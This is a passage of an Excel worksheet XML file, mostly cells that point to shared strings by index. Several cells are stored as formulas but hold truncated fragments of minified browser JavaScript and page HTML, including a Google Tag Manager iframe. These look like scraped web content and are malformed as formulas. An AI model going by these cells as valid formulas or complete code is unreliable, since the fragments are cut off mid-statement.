      <c r="A2041" t="s">
        <v>54</v>
      </c>
      <c r="B2041" t="s">
        <v>1554</v>
      </c>
    </row>
    <row r="2042" spans="1:2">
      <c r="A2042" t="s">
        <v>54</v>
      </c>
      <c r="B2042" t="s">
        <v>1555</v>
      </c>
    </row>
    <row r="2043" spans="1:2">
      <c r="A2043" t="s">
        <v>54</v>
      </c>
      <c r="B2043" t="s">
        <v>1556</v>
      </c>
    </row>
    <row r="2044" spans="1:2">
      <c r="A2044" t="s">
        <v>54</v>
      </c>
      <c r="B2044" t="s">
        <v>1557</v>
      </c>
    </row>
    <row r="2045" spans="1:2">
      <c r="A2045" t="s">
        <v>54</v>
      </c>
      <c r="B2045" t="s">
        <v>1558</v>
      </c>
    </row>
    <row r="2046" spans="1:2">
      <c r="A2046" t="s">
        <v>54</v>
      </c>
      <c r="B2046" t="s">
        <v>1559</v>
      </c>
    </row>
    <row r="2047" spans="1:2">
      <c r="A2047" t="s">
        <v>54</v>
      </c>
      <c r="B2047" t="s">
        <v>1560</v>
      </c>
    </row>
    <row r="2048" spans="1:2">
      <c r="A2048" t="s">
        <v>54</v>
      </c>
      <c r="B2048" t="s">
        <v>1561</v>
      </c>
    </row>
    <row r="2049" spans="1:2">
      <c r="A2049" t="s">
        <v>54</v>
      </c>
      <c r="B2049" t="s">
        <v>1562</v>
      </c>
    </row>
    <row r="2050" spans="1:2">
      <c r="A2050" t="s">
        <v>54</v>
      </c>
      <c r="B2050" t="s">
        <v>1563</v>
      </c>
    </row>
    <row r="2051" spans="1:2">
      <c r="A2051" t="s">
        <v>54</v>
      </c>
      <c r="B2051" t="s">
        <v>1564</v>
      </c>
    </row>
    <row r="2052" spans="1:2">
      <c r="A2052" t="s">
        <v>54</v>
      </c>
      <c r="B2052" t="s">
        <v>1565</v>
      </c>
    </row>
    <row r="2053" spans="1:2">
      <c r="A2053" t="s">
        <v>54</v>
      </c>
      <c r="B2053" t="s">
        <v>1566</v>
      </c>
    </row>
    <row r="2054" spans="1:2">
      <c r="A2054" t="s">
        <v>54</v>
      </c>
      <c r="B2054" t="s">
        <v>1567</v>
      </c>
    </row>
    <row r="2055" spans="1:2">
      <c r="A2055" t="s">
        <v>54</v>
      </c>
      <c r="B2055" t="s">
        <v>1568</v>
      </c>
    </row>
    <row r="2056" spans="1:2">
      <c r="A2056" t="s">
        <v>54</v>
      </c>
      <c r="B2056" t="s">
        <v>1569</v>
      </c>
    </row>
    <row r="2057" spans="1:2">
      <c r="A2057" t="s">
        <v>54</v>
      </c>
      <c r="B2057" t="s">
        <v>1570</v>
      </c>
    </row>
    <row r="2058" spans="1:2">
      <c r="A2058" t="s">
        <v>54</v>
      </c>
      <c r="B2058" t="s">
        <v>1571</v>
      </c>
    </row>
    <row r="2059" spans="1:2">
      <c r="A2059" t="s">
        <v>54</v>
      </c>
      <c r="B2059" t="s">
        <v>1572</v>
      </c>
    </row>
    <row r="2060" spans="1:2">
      <c r="A2060" t="s">
        <v>54</v>
      </c>
      <c r="B2060" t="s">
        <v>1573</v>
      </c>
    </row>
    <row r="2061" spans="1:2">
      <c r="A2061" t="s">
        <v>22</v>
      </c>
      <c r="B2061" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="2062" spans="1:2">
      <c r="A2062" t="s">
        <v>22</v>
      </c>
      <c r="B2062" t="s">
        <v>790</v>
      </c>
    </row>
    <row r="2063" spans="1:2">
      <c r="A2063" t="s">
        <v>22</v>
      </c>
      <c r="B2063" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="2064" spans="1:2">
      <c r="A2064" t="s">
        <v>22</v>
      </c>
      <c r="B2064" t="s">
        <v>792</v>
      </c>
    </row>
    <row r="2065" spans="1:2">
      <c r="A2065" t="s">
        <v>55</v>
      </c>
      <c r="B2065" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="2066" spans="1:2">
      <c r="A2066" t="s">
        <v>55</v>
      </c>
      <c r="B2066" t="s">
        <v>1575</v>
      </c>
    </row>
    <row r="2067" spans="1:2">
      <c r="A2067" t="s">
        <v>55</v>
      </c>
      <c r="B2067" t="s">
        <v>387</v>
      </c>
    </row>
    <row r="2068" spans="1:2">
      <c r="A2068" t="s">
        <v>55</v>
      </c>
      <c r="B2068" t="s">
        <v>1576</v>
      </c>
    </row>
    <row r="2069" spans="1:2">
      <c r="A2069" t="s">
        <v>55</v>
      </c>
      <c r="B2069" t="s">
        <v>1577</v>
      </c>
    </row>
    <row r="2070" spans="1:2">
      <c r="A2070" t="s">
        <v>55</v>
      </c>
      <c r="B2070" t="s">
        <v>1578</v>
      </c>
    </row>
    <row r="2071" spans="1:2">
      <c r="A2071" t="s">
        <v>55</v>
      </c>
      <c r="B2071" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="2072" spans="1:2">
      <c r="A2072" t="s">
        <v>55</v>
      </c>
      <c r="B2072" t="s">
        <v>1580</v>
      </c>
    </row>
    <row r="2073" spans="1:2">
      <c r="A2073" t="s">
        <v>55</v>
      </c>
      <c r="B2073" t="s">
        <v>1581</v>
      </c>
    </row>
    <row r="2074" spans="1:2">
      <c r="A2074" t="s">
        <v>55</v>
      </c>
      <c r="B2074" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="2075" spans="1:2">
      <c r="A2075" t="s">
        <v>55</v>
      </c>
      <c r="B2075" t="s">
        <v>1583</v>
      </c>
    </row>
    <row r="2076" spans="1:2">
      <c r="A2076" t="s">
        <v>55</v>
      </c>
      <c r="B2076" t="s">
        <v>1584</v>
      </c>
    </row>
    <row r="2077" spans="1:2">
      <c r="A2077" t="s">
        <v>55</v>
      </c>
      <c r="B2077" t="s">
        <v>1585</v>
      </c>
    </row>
    <row r="2078" spans="1:2">
      <c r="A2078" t="s">
        <v>55</v>
      </c>
      <c r="B2078" t="s">
        <v>1586</v>
      </c>
    </row>
    <row r="2079" spans="1:2">
      <c r="A2079" t="s">
        <v>55</v>
      </c>
      <c r="B2079" t="s">
        <v>1587</v>
      </c>
    </row>
    <row r="2080" spans="1:2">
      <c r="A2080" t="s">
        <v>55</v>
      </c>
      <c r="B2080" t="s">
        <v>1588</v>
      </c>
    </row>
    <row r="2081" spans="1:2">
      <c r="A2081" t="s">
        <v>55</v>
      </c>
      <c r="B2081" t="s">
        <v>1589</v>
      </c>
    </row>
    <row r="2082" spans="1:2">
      <c r="A2082" t="s">
        <v>55</v>
      </c>
      <c r="B2082" t="s">
        <v>1590</v>
      </c>
    </row>
    <row r="2083" spans="1:2">
      <c r="A2083" t="s">
        <v>55</v>
      </c>
      <c r="B2083" t="s">
        <v>1591</v>
      </c>
    </row>
    <row r="2084" spans="1:2">
      <c r="A2084" t="s">
        <v>55</v>
      </c>
      <c r="B2084" t="s">
        <v>406</v>
      </c>
    </row>
    <row r="2085" spans="1:2">
      <c r="A2085" t="s">
        <v>55</v>
      </c>
      <c r="B2085" t="s">
        <v>407</v>
      </c>
    </row>
    <row r="2086" spans="1:2">
      <c r="A2086" t="s">
        <v>55</v>
      </c>
      <c r="B2086" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="2087" spans="1:2">
      <c r="A2087" t="s">
        <v>55</v>
      </c>
      <c r="B2087" t="s">
        <v>1593</v>
      </c>
    </row>
    <row r="2088" spans="1:2">
      <c r="A2088" t="s">
        <v>55</v>
      </c>
      <c r="B2088" t="s">
        <v>1594</v>
      </c>
    </row>
    <row r="2089" spans="1:2">
      <c r="A2089" t="s">
        <v>55</v>
      </c>
      <c r="B2089" t="s">
        <v>1595</v>
      </c>
    </row>
    <row r="2090" spans="1:2">
      <c r="A2090" t="s">
        <v>55</v>
      </c>
      <c r="B2090" t="s">
        <v>1596</v>
      </c>
    </row>
    <row r="2091" spans="1:2">
      <c r="A2091" t="s">
        <v>55</v>
      </c>
      <c r="B2091" t="s">
        <v>1597</v>
      </c>
    </row>
    <row r="2092" spans="1:2">
      <c r="A2092" t="s">
        <v>55</v>
      </c>
      <c r="B2092" t="s">
        <v>1598</v>
      </c>
    </row>
    <row r="2093" spans="1:2">
      <c r="A2093" t="s">
        <v>55</v>
      </c>
      <c r="B2093" t="s">
        <v>1599</v>
      </c>
    </row>
    <row r="2094" spans="1:2">
      <c r="A2094" t="s">
        <v>55</v>
      </c>
      <c r="B2094" t="s">
        <v>1600</v>
      </c>
    </row>
    <row r="2095" spans="1:2">
      <c r="A2095" t="s">
        <v>55</v>
      </c>
      <c r="B2095" t="s">
        <v>1601</v>
      </c>
    </row>
    <row r="2096" spans="1:2">
      <c r="A2096" t="s">
        <v>55</v>
      </c>
      <c r="B2096" t="s">
        <v>1602</v>
      </c>
    </row>
    <row r="2097" spans="1:2">
      <c r="A2097" t="s">
        <v>56</v>
      </c>
      <c r="B2097" t="s">
        <v>1603</v>
      </c>
    </row>
    <row r="2098" spans="1:2">
      <c r="A2098" t="s">
        <v>56</v>
      </c>
      <c r="B2098" t="s">
        <v>1604</v>
      </c>
    </row>
    <row r="2099" spans="1:2">
      <c r="A2099" t="s">
        <v>56</v>
      </c>
      <c r="B2099" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="2100" spans="1:2">
      <c r="A2100" t="s">
        <v>56</v>
      </c>
      <c r="B2100" t="s">
        <v>1606</v>
      </c>
    </row>
    <row r="2101" spans="1:2">
      <c r="A2101" t="s">
        <v>56</v>
      </c>
      <c r="B2101" t="s">
        <v>1607</v>
      </c>
    </row>
    <row r="2102" spans="1:2">
      <c r="A2102" t="s">
        <v>56</v>
      </c>
      <c r="B2102" t="s">
        <v>1608</v>
      </c>
    </row>
    <row r="2103" spans="1:2">
      <c r="A2103" t="s">
        <v>56</v>
      </c>
      <c r="B2103" t="s">
        <v>1609</v>
      </c>
    </row>
    <row r="2104" spans="1:2">
      <c r="A2104" t="s">
        <v>56</v>
      </c>
      <c r="B2104" t="s">
        <v>1610</v>
      </c>
    </row>
    <row r="2105" spans="1:2">
      <c r="A2105" t="s">
        <v>56</v>
      </c>
      <c r="B2105" t="s">
        <v>1611</v>
      </c>
    </row>
    <row r="2106" spans="1:2">
      <c r="A2106" t="s">
        <v>56</v>
      </c>
      <c r="B2106" t="s">
        <v>1612</v>
      </c>
    </row>
    <row r="2107" spans="1:2">
      <c r="A2107" t="s">
        <v>56</v>
      </c>
      <c r="B2107" t="s">
        <v>1613</v>
      </c>
    </row>
    <row r="2108" spans="1:2">
      <c r="A2108" t="s">
        <v>56</v>
      </c>
      <c r="B2108" t="s">
        <v>1614</v>
      </c>
    </row>
    <row r="2109" spans="1:2">
      <c r="A2109" t="s">
        <v>56</v>
      </c>
      <c r="B2109" t="s">
        <v>1615</v>
      </c>
    </row>
    <row r="2110" spans="1:2">
      <c r="A2110" t="s">
        <v>56</v>
      </c>
      <c r="B2110" t="s">
        <v>1616</v>
      </c>
    </row>
    <row r="2111" spans="1:2">
      <c r="A2111" t="s">
        <v>56</v>
      </c>
      <c r="B2111" t="s">
        <v>1617</v>
      </c>
    </row>
    <row r="2112" spans="1:2">
      <c r="A2112" t="s">
        <v>56</v>
      </c>
      <c r="B2112" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="2113" spans="1:2">
      <c r="A2113" t="s">
        <v>56</v>
      </c>
      <c r="B2113" t="s">
        <v>1619</v>
      </c>
    </row>
    <row r="2114" spans="1:2">
      <c r="A2114" t="s">
        <v>56</v>
      </c>
      <c r="B2114" t="s">
        <v>1620</v>
      </c>
    </row>
    <row r="2115" spans="1:2">
      <c r="A2115" t="s">
        <v>56</v>
      </c>
      <c r="B2115" t="s">
        <v>1621</v>
      </c>
    </row>
    <row r="2116" spans="1:2">
      <c r="A2116" t="s">
        <v>56</v>
      </c>
      <c r="B2116" t="s">
        <v>1622</v>
      </c>
    </row>
    <row r="2117" spans="1:2">
      <c r="A2117" t="s">
        <v>56</v>
      </c>
      <c r="B2117" t="s">
        <v>1623</v>
      </c>
    </row>
    <row r="2118" spans="1:2">
      <c r="A2118" t="s">
        <v>56</v>
      </c>
      <c r="B2118" t="s">
        <v>1624</v>
      </c>
    </row>
    <row r="2119" spans="1:2">
      <c r="A2119" t="s">
        <v>56</v>
      </c>
      <c r="B2119" t="s">
        <v>1625</v>
      </c>
    </row>
    <row r="2120" spans="1:2">
      <c r="A2120" t="s">
        <v>56</v>
      </c>
      <c r="B2120" t="s">
        <v>1626</v>
      </c>
    </row>
    <row r="2121" spans="1:2">
      <c r="A2121" t="s">
        <v>56</v>
      </c>
      <c r="B2121" t="s">
        <v>1627</v>
      </c>
    </row>
    <row r="2122" spans="1:2">
      <c r="A2122" t="s">
        <v>56</v>
      </c>
      <c r="B2122" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="2123" spans="1:2">
      <c r="A2123" t="s">
        <v>56</v>
      </c>
      <c r="B2123" t="s">
        <v>1629</v>
      </c>
    </row>
    <row r="2124" spans="1:2">
      <c r="A2124" t="s">
        <v>56</v>
      </c>
      <c r="B2124" t="s">
        <v>1630</v>
      </c>
    </row>
    <row r="2125" spans="1:2">
      <c r="A2125" t="s">
        <v>56</v>
      </c>
      <c r="B2125" t="s">
        <v>1631</v>
      </c>
    </row>
    <row r="2126" spans="1:2">
      <c r="A2126" t="s">
        <v>56</v>
      </c>
      <c r="B2126" t="s">
        <v>1632</v>
      </c>
    </row>
    <row r="2127" spans="1:2">
      <c r="A2127" t="s">
        <v>56</v>
      </c>
      <c r="B2127" t="s">
        <v>1633</v>
      </c>
    </row>
    <row r="2128" spans="1:2">
      <c r="A2128" t="s">
        <v>56</v>
      </c>
      <c r="B2128" t="s">
        <v>1634</v>
      </c>
    </row>
    <row r="2129" spans="1:2">
      <c r="A2129" t="s">
        <v>56</v>
      </c>
      <c r="B2129" t="s">
        <v>1635</v>
      </c>
    </row>
    <row r="2130" spans="1:2">
      <c r="A2130" t="s">
        <v>56</v>
      </c>
      <c r="B2130" t="s">
        <v>1636</v>
      </c>
    </row>
    <row r="2131" spans="1:2">
      <c r="A2131" t="s">
        <v>56</v>
      </c>
      <c r="B2131" t="s">
        <v>1637</v>
      </c>
    </row>
    <row r="2132" spans="1:2">
      <c r="A2132" t="s">
        <v>56</v>
      </c>
      <c r="B2132" t="s">
        <v>1638</v>
      </c>
    </row>
    <row r="2133" spans="1:2">
      <c r="A2133" t="s">
        <v>56</v>
      </c>
      <c r="B2133" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="2134" spans="1:2">
      <c r="A2134" t="s">
        <v>56</v>
      </c>
      <c r="B2134" t="s">
        <v>1640</v>
      </c>
    </row>
    <row r="2135" spans="1:2">
      <c r="A2135" t="s">
        <v>56</v>
      </c>
      <c r="B2135" t="s">
        <v>1641</v>
      </c>
    </row>
    <row r="2136" spans="1:2">
      <c r="A2136" t="s">
        <v>56</v>
      </c>
      <c r="B2136" t="s">
        <v>1642</v>
      </c>
    </row>
    <row r="2137" spans="1:2">
      <c r="A2137" t="s">
        <v>56</v>
      </c>
      <c r="B2137" t="s">
        <v>1643</v>
      </c>
    </row>
    <row r="2138" spans="1:2">
      <c r="A2138" t="s">
        <v>56</v>
      </c>
      <c r="B2138">
        <f>function(){return ca?!!_.da&amp;&amp;0&lt;_.da.brands.length:!1};_.ia=function(){return _.fa()?!1:_.q("Opera")};_.ka =function(){return _.fa()?!1:_.q("Trident")||_.q("MSIE")};_.la =function(){return _.fa()?!1:_.q("Edge")};_.ma</f>
        <v>0</v>
      </c>
    </row>
    <row r="2139" spans="1:2">
      <c r="A2139" t="s">
        <v>56</v>
      </c>
      <c r="B2139">
        <f>function(){return _.fa()?_.ea("Microsoft Edge"):_.q("Edg/")};_.na=function(){return _.q("Firefox")||_.q("FxiOS")};_.pa =function(){return _.q("Safari")&amp;&amp;!(_.oa()||(_.fa()?0:_.q("Coast"))||_.ia()||_.la()||_.ma()||(_.fa()?_.ea("Opera"):_.q("OPR"))||_.na()||_.q("Silk")||_.q("Android"))};
_.oa</f>
        <v>0</v>
      </c>
    </row>
    <row r="2140" spans="1:2">
      <c r="A2140" t="s">
        <v>56</v>
      </c>
      <c r="B2140">
        <f>function(){return _.fa()?_.ea("Chromium"):(_.q("Chrome")||_.q("CriOS"))&amp;&amp;!_.la()||_.q("Silk")};_.qa=function(){return _.q("Android")&amp;&amp;!(_.oa()||_.na()||_.ia()||_.q("Silk"))};_.ra =function(){return ca?!!_.da&amp;&amp;!!_.da.platform:!1};_.sa=function(){return _.ra()?"Android"===_.da.platform:_.q("Android")};ta =function(){return _.q("iPhone")&amp;&amp;!_.q("iPod")&amp;&amp;!_.q("iPad")};_.ua</f>
        <v>0</v>
      </c>
    </row>
    <row r="2141" spans="1:2">
      <c r="A2141" t="s">
        <v>56</v>
      </c>
      <c r="B2141">
        <f>function(){return ta()||_.q("iPad")||_.q("iPod")};_.va=function(){return _.ra()?"macOS"===_.da.platform:_.q("Macintosh")};
_.wa =function(){return _.ra()?"Windows"===_.da.platform:_.q("Windows")};_.xa =function(a){var b=a.length;if(0&lt;b){for(var c=Array(b),d=0;d&lt;b;d++)c[d]=a[d];return c}return[]};_.ya=function(){return-1!=_.ba().toLowerCase().indexOf("webkit")&amp;&amp;!_.q("Edge")};_.Ba=function(a){if(!_.za)return _.Aa(a);for(var</f>
        <v>0</v>
      </c>
    </row>
    <row r="2142" spans="1:2">
      <c r="A2142" t="s">
        <v>56</v>
      </c>
      <c r="B2142" t="s">
        <v>1644</v>
      </c>
    </row>
    <row r="2143" spans="1:2">
      <c r="A2143" t="s">
        <v>56</v>
      </c>
      <c r="B2143">
        <f>function(a,b){_.Ea?a[_.Ea]=b:void 0!==a.wb?a.wb=b:Object.defineProperties(a,{wb:{value:b,configurable:!0,writable:!0,enumerable:!1}});return a};_.Ja=function(a){_.Fa(a,1);return a};_.Ka=function(a){_.Fa(a,16);return a};La=function(a,b){_.Ha(b,(a|0)&amp;-51)};Ma=function(a,b){_.Ha(b,(a|18)&amp;-41)};Na=function(a){return null!==a&amp;&amp;"object"===typeof a&amp;&amp;!Array.isArray(a)&amp;&amp;a.constructor===Object};_.Oa=function(a){if(_.Ga(a.na)&amp;2)throw Error();};
Pa=function(a){var b=a.length;(b=b?a[b-1]:void 0)&amp;&amp;Na(b)?b.g=1:(b={},a.push((b.g=1,b)))};_.Qa=function(a,b){var c=_.Ga(a),d=c;0===d&amp;&amp;(d|=b&amp;16);d|=b&amp;2;d!==c&amp;&amp;_.Ha(a,d)};_.Ra=function(a,b){return null==a?b:a};_.Ta=function(a,b){Sa=b;a=new a(b);Sa=void 0;return a};
Va=function(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "object":if(a)if(Array.isArray(a)){if(0!==(_.Ga(a)&amp;128))return a=Array.prototype.slice.call(a),Pa(a),a}else{if(_.Da(a))return _.Ba(a);if("function"==typeof _.Ua&amp;&amp;a instanceof _.Ua)return</f>
        <v>0</v>
      </c>
    </row>
    <row r="2144" spans="1:2">
      <c r="A2144" t="s">
        <v>56</v>
      </c>
      <c r="B2144" t="s">
        <v>1645</v>
      </c>
    </row>
    <row r="2145" spans="1:2">
      <c r="A2145" t="s">
        <v>56</v>
      </c>
      <c r="B2145" t="s">
        <v>1646</v>
      </c>
    </row>
    <row r="2146" spans="1:2">
      <c r="A2146" t="s">
        <v>56</v>
      </c>
      <c r="B2146">
        <f>pb;a=a.split(". ");for(var d=0;d&lt;a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&amp;&amp;null!=b&amp;&amp;nb(c,a,{configurable:!0,writable:!0,value:b})}};
qb("Symbol",function(a){if(a)return a;var b=function(f,g){this.i=f;nb(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.i};var c="jscomp_symbol_"+(1E9*Math.random()&gt;&gt;&gt;0)+"_",d=0,e=function(f){if(this instanceof e)throw new TypeError("b");return new b(c+(f||"")+"_"+d++,f)};return e});
qb("Symbol.iterator",function(a){if(a)return a;a=Symbol("c");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c&lt;b.length;c++){var d=pb[b[c]];"function"===typeof d&amp;&amp;"function"!=typeof d.prototype[a]&amp;&amp;nb(d.prototype,a,{configurable:!0,writable:!0,value:function(){return rb(mb(this))}})}return a});rb=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};
_.sb =function(a){var b="undefined"!=typeof Symbol&amp;&amp;Symbol.iterator&amp;&amp;a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:mb(a)};throw Error("d`"+String(a));};tb="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b};
if("function"==typeof Object.setPrototypeOf)ub=Object.setPrototypeOf;else{var vb;a:{var wb={a:!0},xb={};try{xb.__proto__=wb;vb=xb.a;break a}catch(a){}vb=!1}ub=vb?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError("e`"+a);return a}:null}yb=ub;
_.v</f>
        <v>0</v>
      </c>
    </row>
    <row r="2147" spans="1:2">
      <c r="A2147" t="s">
        <v>56</v>
      </c>
      <c r="B2147">
        <f>function(a,b){a.prototype=tb(b.prototype);a.prototype.constructor=a;if(yb)yb(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&amp;&amp;Object.defineProperty(a,c,d)}else a[c]=b[c];a. U=b.prototype};
qb("Promise",function(a){function b(){this.i=null}function c(g){return g instanceof e?g:new e(function(h){h(g)})}if(a)return a;b.prototype.j=function(g){if(null==this.i){this.i=[];var h=this;this.o(function(){h.v()})}this.i.push(g)};var d=pb.setTimeout;b.prototype.o=function(g){d(g,0)};b.prototype.v=function(){for(;this.i&amp;&amp;this.i.length;){var g=this.i;this.i=[];for(var h=0;h&lt;g.length;++h){var l=g[h];g[h]=null;try{l()}catch(m){this.s(m)}}}this.i=null};b.prototype.s=function(g){this.o(function(){throw g;
})};var e=funct</f>
        <v>0</v>
      </c>
    </row>
    <row r="2148" spans="1:2">
      <c r="A2148" t="s">
        <v>57</v>
      </c>
      <c r="B2148" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="2149" spans="1:2">
      <c r="A2149" t="s">
        <v>58</v>
      </c>
      <c r="B2149" t="s">
        <v>1647</v>
      </c>
    </row>
    <row r="2150" spans="1:2">
      <c r="A2150" t="s">
        <v>58</v>
      </c>
      <c r="B2150" t="s">
        <v>1648</v>
      </c>
    </row>
    <row r="2151" spans="1:2">
      <c r="A2151" t="s">
        <v>58</v>
      </c>
      <c r="B2151">
        <f> true;
&lt;/script&gt;
            &lt;script&gt;
    window.vm = {"theme":"aurora-theme"};
&lt;/script&gt;
&lt;div id="app"&gt;&lt;/div&gt;
        &lt;script src="/js/translation/es6-translation.en_US.v5c29b77ae2a6650e0d1e382db6e75ae6eb2d499f.js"&gt;&lt;/script&gt;
&lt;div id="non_visible_data" style="display:none"&gt;&lt;/div&gt;
&lt;/body&gt;
&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WDTG4ZN"
height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
&lt;/html&gt;
</f>
        <v>0</v>
      </c>
    </row>
    <row r="2152" spans="1:2">
      <c r="A2152" t="s">
        <v>34</v>
      </c>
      <c r="B2152" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="2153" spans="1:2">
      <c r="A2153" t="s">
        <v>59</v>
      </c>
      <c r="B2153" t="s">
        <v>1649</v>
      </c>
    </row>
    <row r="2154" spans="1:2">
      <c r="A2154" t="s">
        <v>59</v>
      </c>
      <c r="B2154" t="s">
        <v>1650</v>
      </c>
    </row>
    <row r="2155" spans="1:2">
      <c r="A2155" t="s">
        <v>59</v>
      </c>
      <c r="B2155" t="s">
        <v>1651</v>
      </c>
    </row>
    <row r="2156" spans="1:2">
      <c r="A2156" t="s">
        <v>59</v>
      </c>
      <c r="B2156" t="s">
        <v>1652</v>
      </c>
    </row>
    <row r="2157" spans="1:2">
      <c r="A2157" t="s">
        <v>59</v>
      </c>
      <c r="B2157" t="s">
        <v>1653</v>
      </c>
    </row>
    <row r="2158" spans="1:2">
      <c r="A2158" t="s">
        <v>59</v>
      </c>
      <c r="B2158" t="s">
        <v>1654</v>
      </c>
    </row>
    <row r="2159" spans="1:2">
      <c r="A2159" t="s">
        <v>60</v>
      </c>
      <c r="B2159" t="s">
        <v>1655</v>
      </c>
    </row>
    <row r="2160" spans="1:2">
      <c r="A2160" t="s">
        <v>60</v>
      </c>
      <c r="B2160" t="s">
        <v>1656</v>
      </c>
    </row>
    <row r="2161" spans="1:2">
      <c r="A2161" t="s">
        <v>60</v>
      </c>
      <c r="B2161" t="s">
        <v>1657</v>
      </c>
    </row>
    <row r="2162" spans="1:2">
      <c r="A2162" t="s">
        <v>60</v>
      </c>
      <c r="B2162" t="s">
        <v>1658</v>
      </c>
    </row>
    <row r="2163" spans="1:2">
      <c r="A2163" t="s">
        <v>60</v>
      </c>
      <c r="B2163" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="2164" spans="1:2">
      <c r="A2164" t="s">
        <v>60</v>
      </c>
      <c r="B2164" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="2165" spans="1:2">
      <c r="A2165" t="s">
        <v>60</v>
      </c>
      <c r="B2165" t="s">
        <v>1661</v>
      </c>
    </row>
    <row r="2166" spans="1:2">
      <c r="A2166" t="s">
        <v>60</v>
      </c>
      <c r="B2166" t="s">
        <v>1662</v>
      </c>
    </row>
    <row r="2167" spans="1:2">
      <c r="A2167" t="s">
        <v>60</v>
      </c>
      <c r="B2167" t="s">
        <v>1663</v>
      </c>
    </row>
    <row r="2168" spans="1:2">
      <c r="A2168" t="s">
        <v>60</v>
      </c>
      <c r="B2168" t="s">
        <v>1664</v>
      </c>
    </row>
    <row r="2169" spans="1:2">
      <c r="A2169" t="s">
        <v>60</v>
      </c>
      <c r="B2169" t="s">
        <v>1665</v>
      </c>
    </row>
    <row r="2170" spans="1:2">
      <c r="A2170" t="s">
        <v>60</v>
      </c>
      <c r="B2170" t="s">
        <v>1666</v>
      </c>
    </row>
    <row r="2171" spans="1:2">
      <c r="A2171" t="s">
        <v>60</v>
      </c>
      <c r="B2171" t="s">
        <v>1667</v>
      </c>
    </row>
    <row r="2172" spans="1:2">
      <c r="A2172" t="s">
        <v>60</v>
      </c>
      <c r="B2172" t="s">
        <v>1668</v>
      </c>
    </row>
    <row r="2173" spans="1:2">
      <c r="A2173" t="s">
        <v>60</v>
      </c>
      <c r="B2173" t="s">
        <v>1669</v>
      </c>
    </row>
    <row r="2174" spans="1:2">
      <c r="A2174" t="s">
        <v>60</v>
      </c>
      <c r="B2174" t="s">
        <v>1670</v>
      </c>
    </row>
    <row r="2175" spans="1:2">
      <c r="A2175" t="s">
        <v>60</v>
      </c>
      <c r="B2175" t="s">
        <v>1671</v>
      </c>
    </row>
    <row r="2176" spans="1:2">
      <c r="A2176" t="s">
        <v>60</v>
      </c>
      <c r="B2176" t="s">
        <v>1672</v>
      </c>
    </row>
    <row r="2177" spans="1:2">
      <c r="A2177" t="s">
        <v>60</v>
      </c>
      <c r="B2177" t="s">
        <v>1673</v>
      </c>
    </row>
    <row r="2178" spans="1:2">
      <c r="A2178" t="s">
        <v>60</v>
      </c>
      <c r="B2178" t="s">
        <v>1674</v>
      </c>
    </row>
    <row r="2179" spans="1:2">
      <c r="A2179" t="s">
        <v>60</v>
      </c>
      <c r="B2179" t="s">
        <v>1675</v>
      </c>
    </row>
    <row r="2180" spans="1:2">
      <c r="A2180" t="s">
        <v>60</v>
      </c>
      <c r="B2180" t="s">
        <v>1676</v>
      </c>
    </row>
    <row r="2181" spans="1:2">
      <c r="A2181" t="s">
        <v>60</v>
      </c>
      <c r="B2181" t="s">
        <v>1677</v>
      </c>
    </row>
    <row r="2182" spans="1:2">
      <c r="A2182" t="s">
        <v>60</v>
      </c>
      <c r="B2182" t="s">
        <v>1678</v>
      </c>
    </row>
    <row r="2183" spans="1:2">
      <c r="A2183" t="s">
        <v>60</v>
      </c>
      <c r="B2183" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="2184" spans="1:2">
      <c r="A2184" t="s">
        <v>60</v>
      </c>
      <c r="B2184" t="s">
        <v>1680</v>
      </c>
    </row>
    <row r="2185" spans="1:2">
      <c r="A2185" t="s">
        <v>60</v>
      </c>
      <c r="B2185" t="s">
        <v>1681</v>
      </c>
    </row>
    <row r="2186" spans="1:2">
      <c r="A2186" t="s">
        <v>60</v>
      </c>
      <c r="B2186" t="s">
        <v>1682</v>
      </c>
    </row>
    <row r="2187" spans="1:2">
      <c r="A2187" t="s">
        <v>60</v>
      </c>
      <c r="B2187" t="s">
        <v>1683</v>
      </c>
    </row>
    <row r="2188" spans="1:2">
      <c r="A2188" t="s">
        <v>60</v>
      </c>
      <c r="B2188" t="s">
        <v>1684</v>
      </c>
    </row>
    <row r="2189" spans="1:2">
      <c r="A2189" t="s">
        <v>60</v>
      </c>
      <c r="B2189" t="s">
        <v>1685</v>
      </c>
    </row>
    <row r="2190" spans="1:2">
      <c r="A2190" t="s">
        <v>60</v>
      </c>
      <c r="B2190" t="s">
        <v>1686</v>
      </c>
    </row>
    <row r="2191" spans="1:2">
      <c r="A2191" t="s">
        <v>60</v>
      </c>
      <c r="B2191" t="s">
        <v>1687</v>
      </c>
    </row>
    <row r="2192" spans="1:2">
      <c r="A2192" t="s">
        <v>60</v>
      </c>
      <c r="B2192" t="s">
        <v>1688</v>
      </c>
    </row>
    <row r="2193" spans="1:2">
      <c r="A2193" t="s">
        <v>60</v>
      </c>
      <c r="B2193" t="s">
        <v>1689</v>
      </c>
    </row>
